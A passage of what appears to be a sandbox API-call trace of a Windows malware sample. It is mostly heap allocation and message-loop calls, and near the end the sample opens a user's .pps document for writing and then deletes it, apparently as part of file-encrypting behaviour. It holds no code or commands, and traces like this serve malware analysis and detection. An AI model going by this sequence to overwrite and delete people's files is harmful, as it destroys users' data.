lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0179.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0179.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0179.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0179.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0179.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0179.610] CharLowerBuffW (in: lpsz="byte[79861]", cchLength=0xb | out: lpsz="byte[79861]") returned 0xb [0179.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0179.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0179.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0179.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0179.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0179.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0179.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0179.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0179.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0179.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0179.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0179.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0179.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0179.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0179.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.612] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0179.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0179.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0179.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0179.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0179.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0179.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0179.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0179.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0179.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0179.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0179.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0179.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0179.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0179.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0179.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0179.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0179.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0179.613] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0179.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0179.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0179.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0179.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0179.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0179.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0179.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0179.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0179.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0179.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0179.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0179.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0179.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0179.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0179.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0179.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0179.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0179.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0179.614] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0179.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0179.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c26c8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0179.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0179.615] GetProcAddress (hModule=0x75c90000, lpProcName="memset") returned 0x75c99790 [0179.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0179.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0179.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0179.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0179.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0179.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0179.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0179.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0179.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0179.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0179.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0179.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0179.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0179.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0179.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0179.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0179.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0179.615] FreeLibrary (hLibModule=0x75c90000) returned 1 [0179.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0179.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0179.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0179.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0179.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0179.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0179.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0179.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0179.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0179.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0179.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0179.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0179.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0179.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0179.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0179.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0179.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0179.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0179.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0179.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0179.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0179.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0179.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0179.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0179.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0179.616] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.616] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.616] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.616] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0179.617] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.617] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.617] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.617] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.617] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.617] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.617] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.617] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.617] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.617] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.617] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.617] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.617] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.617] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.617] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.617] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.617] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0179.617] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0179.618] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\orhlgisqmqrnaihm\\vupb0.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0179.618] FreeLibrary (hLibModule=0x75990000) returned 1 [0179.618] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.618] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.618] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.618] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0179.618] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.618] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.618] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0179.620] FreeLibrary (hLibModule=0x75990000) returned 1 [0179.620] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.620] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.620] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.620] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.620] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0179.620] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.621] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.621] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0179.621] FreeLibrary (hLibModule=0x75990000) returned 1 [0179.622] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.622] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.622] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.622] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps", lpFilePart=0x0) returned 0x52 [0179.624] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c95c9b0, ftCreationTime.dwHighDateTime=0x1d5e3d7, ftLastAccessTime.dwLowDateTime=0xd9387fe0, ftLastAccessTime.dwHighDateTime=0x1d5e756, ftLastWriteTime.dwLowDateTime=0x105552a0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x137f5, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="vupb0.pps", cAlternateFileName="")) returned 0x90af58 [0179.625] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\orhlgisqmqrnaihm\\vupb0.pps")) returned 1 [0179.628] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c95c9b0, ftCreationTime.dwHighDateTime=0x1d5e3d7, ftLastAccessTime.dwLowDateTime=0xd9387fe0, ftLastAccessTime.dwHighDateTime=0x1d5e756, ftLastWriteTime.dwLowDateTime=0x105552a0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x137f5, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="vupb0.pps", cAlternateFileName="")) returned 0 [0179.628] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0179.628] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.629] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0179.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0179.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0179.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0179.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0179.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0179.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0179.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0179.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0179.629] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0179.629] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0179.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0179.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0179.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0179.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0179.630] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0179.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0179.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0179.630] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0179.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 